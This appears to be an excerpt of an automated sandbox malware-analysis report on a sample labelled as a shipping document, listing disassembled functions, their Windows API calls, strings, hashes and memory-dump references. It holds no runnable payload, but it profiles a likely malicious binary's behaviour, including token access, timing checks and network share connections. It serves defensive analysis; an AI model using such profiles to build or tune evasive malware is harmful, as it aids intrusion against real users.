Instruction ID: f32d5a9a29ed23e42d4118fbdc81428367a2798a13a7ba8e0611d2a2df6ff810
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: A9014C32600148BBDF12AE95CC42EEB7F79EF98754F054018FE5896121C73AE961FBA0

Function 00F73003 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F8242E,00000000,00000000,?,00F72FAA,00F8242E,00000000,00000000,00000000,?,00F7321B,00000006,FlsSetValue), ref: 00F73035
GetLastError.KERNEL32(?,00F72FAA,00F8242E,00000000,00000000,00000000,?,00F7321B,00000006,FlsSetValue,00FE22B0,FlsSetValue,00000000,00000364,?,00F72DD6), ref: 00F73041
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F72FAA,00F8242E,00000000,00000000,00000000,?,00F7321B,00000006,FlsSetValue,00FE22B0,FlsSetValue,00000000), ref: 00F7304F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5d6668d611fa1f85a7485de5672e55e0833dd2d7f9d17dc3798a7027430155a0
Instruction ID: ca0a06164d69f7fb3cf9a09d80bacd740664e135c340dcf5264cebca7fbd0f7e
Opcode Fuzzy Hash: 5d6668d611fa1f85a7485de5672e55e0833dd2d7f9d17dc3798a7027430155a0
Instruction Fuzzy Hash: A0012032611237FBCB314A7D9C44E577759AF05BB5B104622F90DD7180C720D901F6D1

Function 00FA73BA Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00FA73D5
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FA73ED
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FA7402
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FA7420

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 2b7ede768c0c574104c9cecb7221230c87a0a945add10f641f4277ddf6351352
Instruction ID: 9f21bc8593260eb58ea60d3659d0972c149f5cffaf367a4d09189e25bb7ec558
Opcode Fuzzy Hash: 2b7ede768c0c574104c9cecb7221230c87a0a945add10f641f4277ddf6351352
Instruction Fuzzy Hash: 55118EF1246305DBE720EF20DC08F927BFCEB05B04F50852AA91AD7090E7B0E904EB90

Function 00FAAFC6 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00FAABF1,?,00008000), ref: 00FAAFE2
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FAABF1,?,00008000), ref: 00FAB007
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00FAABF1,?,00008000), ref: 00FAB011
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FAABF1,?,00008000), ref: 00FAB044

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 55aaf279bb2c5ac906fd1cce8ccd5193dc7b7f7c04ec724bc8835bfb569edb14
Instruction ID: b7fbcd9964743b5e81f850de825061bca5a6340ea223354312d87136051b7167
Opcode Fuzzy Hash: 55aaf279bb2c5ac906fd1cce8ccd5193dc7b7f7c04ec724bc8835bfb569edb14
Instruction Fuzzy Hash: 5A116DB1C0162DEBCF049FE5D9487EEBB78FF0A711F118096D952B2182CB349650EB95

Function 00FA2CEB Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00FA2D09
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA2D1A
GetCurrentThreadId.KERNEL32 ref: 00FA2D21
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00FA2D28

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: aa53bc6a0c54aa7c36024e0886a9e6b03f671df624d821b485f85c22fcb8f337
Instruction ID: 19498a0e55bddfd422a5b75974b328a4a6db3a63a042c5df7ecce5ddb08c2566
Opcode Fuzzy Hash: aa53bc6a0c54aa7c36024e0886a9e6b03f671df624d821b485f85c22fcb8f337
Instruction Fuzzy Hash: 18E065B164222976DB2017779C0DEE77F1DEF47B61F100016F105D10919690C800E6F0

Function 00FD8755 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00F5AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F5AB19
Part of subcall function 00F5AABF: SelectObject.GDI32(?,00000000), ref: 00F5AB28
Part of subcall function 00F5AABF: BeginPath.GDI32(?), ref: 00F5AB3F
Part of subcall function 00F5AABF: SelectObject.GDI32(?,00000000), ref: 00F5AB68

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FD8779
LineTo.GDI32(?,?,?), ref: 00FD8786
EndPath.GDI32(?), ref: 00FD8796
StrokePath.GDI32(?), ref: 00FD87A4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 3c6ec6d9f5ee1477dacdf63c65a3c649f8d856b72fb37fd95f138f4612f77235
Instruction ID: 311c43f987a5626997c5bfacdcfc890498c91490c1a85c076de32d2a827a61f3
Opcode Fuzzy Hash: 3c6ec6d9f5ee1477dacdf63c65a3c649f8d856b72fb37fd95f138f4612f77235
Instruction Fuzzy Hash: FCF05E32046259FADB125FA4AC0DFCE3F5AAF06310F188102FB11A11E2C77A5521EBE5

Function 00F5AD30 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00F5AD4C
SetTextColor.GDI32(?,?), ref: 00F5AD56
SetBkMode.GDI32(?,00000001), ref: 00F5AD69
GetStockObject.GDI32(00000005), ref: 00F5AD71

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 63ed823e02ad2c8642f09e383c2525465363e6c2620b08882c09e9c1385123d4
Instruction ID: 2676589072ad66ab84f7dab6b34c575737cb04ec52ab5bb787df17c864b8abb5
Opcode Fuzzy Hash: 63ed823e02ad2c8642f09e383c2525465363e6c2620b08882c09e9c1385123d4
Instruction Fuzzy Hash: 6DE09232645385AEEF216B74BC09BD83B22AB12736F04831AF7FA580E1C3715940FB51

Function 00FA156F Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00FA1578
OpenThreadToken.ADVAPI32(00000000,?,?,?,00FA111D), ref: 00FA157F
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FA111D), ref: 00FA158C
OpenProcessToken.ADVAPI32(00000000,?,?,?,00FA111D), ref: 00FA1593

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 7e3a47abe73c70256ef1ab36dc8b4e2c5e3a322de3e37d483e45b0d6baeb28ed
Instruction ID: cfc904ece2a4cf51ee99c836d221e1f9641d87b1d13e8c07da7477750ea82b97
Opcode Fuzzy Hash: 7e3a47abe73c70256ef1ab36dc8b4e2c5e3a322de3e37d483e45b0d6baeb28ed
Instruction Fuzzy Hash: B2E08675A02212DBD7202FF0AD0CB563F6DAF457A2F154406F246CD090D7744440E7D1

Function 00F9E008 Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00F9E008
GetDC.USER32(00000000), ref: 00F9E012
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F9E01E
ReleaseDC.USER32(?), ref: 00F9E03F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: d8f5f57544a27bd8e4242fb653211596abf33008c50206433e2d504de2b6134e
Instruction ID: 0babc06520d348fc58fe5a20eee7317bd6cf4e4f56a30d3da22b890b5e5996a1
Opcode Fuzzy Hash: d8f5f57544a27bd8e4242fb653211596abf33008c50206433e2d504de2b6134e
Instruction Fuzzy Hash: 39E01A7180220ADFCF109FB0D808A5DBBB2EB08311B108546E949E3210C7389941EF80

Function 00FB4CA5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F48FA0: _wcslen.LIBCMT ref: 00F48FA5

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00FB4DF2

Strings

*, xrefs: 00FB4D2E
LPT, xrefs: 00FB4D19

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: f8c14c7d6ea2e404abe75dd3ce7ac35b66e282085c630d96acb1707d2166956e
Instruction ID: 50b4712245b137a92f506926d3c5bee7fa05d4d48c6c850f14027e242a15fbcd
Opcode Fuzzy Hash: f8c14c7d6ea2e404abe75dd3ce7ac35b66e282085c630d96acb1707d2166956e
Instruction Fuzzy Hash: 07915C75A002149FCB14DF55C984EA9BBF1BF48314F188099E8069F3A2C775EE86DF91

Function 00F6E20D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00F6E29D

Strings

pow, xrefs: 00F6E275, 00F6E292

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 19104594ae2115dc1f9caae19ebecae614ca75d697de9c761e4588c19bfe104a
Instruction ID: 4f57d120fca00da367deb5a3ee368b27b819bbcd45b48b28b678ccb4a58b808c
Opcode Fuzzy Hash: 19104594ae2115dc1f9caae19ebecae614ca75d697de9c761e4588c19bfe104a
Instruction Fuzzy Hash: 99519077E1C30696DB157714CD5237A3BA8AB40760F30CD5AE099462E8EB358CD5BA83

Function 00FC7698 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00F96279,00000000,?,00FDD0D0,?,00000000,00000000), ref: 00FC7804

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

CharUpperBuffW.USER32(00F96279,00000000,?,00FDD0D0,00000000,?,00000000,00000000), ref: 00FC7762

Strings

Ls, xrefs: 00FC76EF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: Ls
API String ID: 3544283678-3558421104
Opcode ID: 3bda9d2a98863f2bc9ad018fa233bb7b82f49eed432556cfe69e3802fedf2124
Instruction ID: 47cd48d03a84d389601505cf1d2b6e0764df22061eeb987f314d14fce2940ff0
Opcode Fuzzy Hash: 3bda9d2a98863f2bc9ad018fa233bb7b82f49eed432556cfe69e3802fedf2124
Instruction Fuzzy Hash: 0261513291421A9BDF04FBE4CD92EFDB778BF14700F544029FA4267091EF685A05EBA0

Function 00F428C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00F428EA

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: f4f023a5a27ca5cf17bb65d80d8636c81d8b59c6bdabf165995589229a87a826
Instruction ID: cabb298e8933afdadeb4a7174bbfa99feca4d5ce039518f5d4e831f8c5fbabf9
Opcode Fuzzy Hash: f4f023a5a27ca5cf17bb65d80d8636c81d8b59c6bdabf165995589229a87a826
Instruction Fuzzy Hash: FB51E071A0424A9FCB55AF28C8806FA7BB4EF16320F644069FD919B2D0DB34AD42FB50

Function 00F5F370 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00F5F381
GlobalMemoryStatusEx.KERNEL32(?), ref: 00F5F39A

Strings

@, xrefs: 00F5F38E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 5f8061fed78e27fb03371a2b8c28389373974803ddecd6d27a48e1535401e54b
Instruction ID: 25de56cbb0e719bdf6b637d7238392bda62e2adccfd5552d486f597632d419bd
Opcode Fuzzy Hash: 5f8061fed78e27fb03371a2b8c28389373974803ddecd6d27a48e1535401e54b
Instruction Fuzzy Hash: 6A515871918748ABE320AF10DC86BAFBBECFF84340F81885DF6D941191DB758429DB66

Function 00FC566C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?), ref: 00FC5707
_wcslen.LIBCMT ref: 00FC5713

Strings

CALLARGARRAY, xrefs: 00FC570D, 00FC5712

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 437242e43448a805a9f60677d260953d2942bf0272ff7ce28e2a97c32d5d0344
Instruction ID: 2a3219e8582d5949a3e93baa29f3242106f134fe1b5b57bedbf4543f874919e6
Opcode Fuzzy Hash: 437242e43448a805a9f60677d260953d2942bf0272ff7ce28e2a97c32d5d0344
Instruction Fuzzy Hash: C9418F71E0020ADFCB04DFA4C986EADBBB5EF59720F14402DE505A7252EB74ADC1EB90

Function 00FBD012 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FBD04E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00FBD058

Strings

|, xrefs: 00FBD029

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 12dab450932ca92535f5cd2f90aab303daa893dc6e6b0b1ed320c47f31de3b2d
Instruction ID: 443783b05d5f6269d33a6926e6ad11930ea4470b41f4ccfff3d159f4a01c7834
Opcode Fuzzy Hash: 12dab450932ca92535f5cd2f90aab303daa893dc6e6b0b1ed320c47f31de3b2d
Instruction Fuzzy Hash: FB315C71C00109ABDF11EFA5CC85AEEBFB9FF08350F004029F815A6166EB359A06EF60

Function 00FD349F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00FD3554
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FD358F

Strings

static, xrefs: 00FD34EF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 8906d5ccf5f6e17a0202d97d075833657b274b9bc980337c71a5723d91417e64
Instruction ID: c1139a651d301c10a49ce7eb1ee4cd88b2d0e2795da8de5044c3d1d857a94aa8
Opcode Fuzzy Hash: 8906d5ccf5f6e17a0202d97d075833657b274b9bc980337c71a5723d91417e64
Instruction Fuzzy Hash: 7B319071500604AADB11DF78DC80BFB73BAFF48760F04861AF9A587280DA34ED81E761

Function 00FD446C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00FD4554
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FD4569

Strings

', xrefs: 00FD44C3

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 30a3fe4ca4426a7cc2769246d6362367fc4159a27ee05d40ad717bb9fa1ab689
Instruction ID: 418ab746ae6fcfd7552d9850708d0460e43b767879b396a2d7ef22f4a1366ba5
Opcode Fuzzy Hash: 30a3fe4ca4426a7cc2769246d6362367fc4159a27ee05d40ad717bb9fa1ab689
Instruction Fuzzy Hash: BB313875E0120A9FDB14CFA9D880BDA7BB6FF09300F18006AE904AB391D730A941DF90

Function 00FD3122 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FD31AF
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FD31BA

Strings

Combobox, xrefs: 00FD317C

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: bcebf63246875870777793385be06660e76619a49d65058f433d392a5e5e27aa
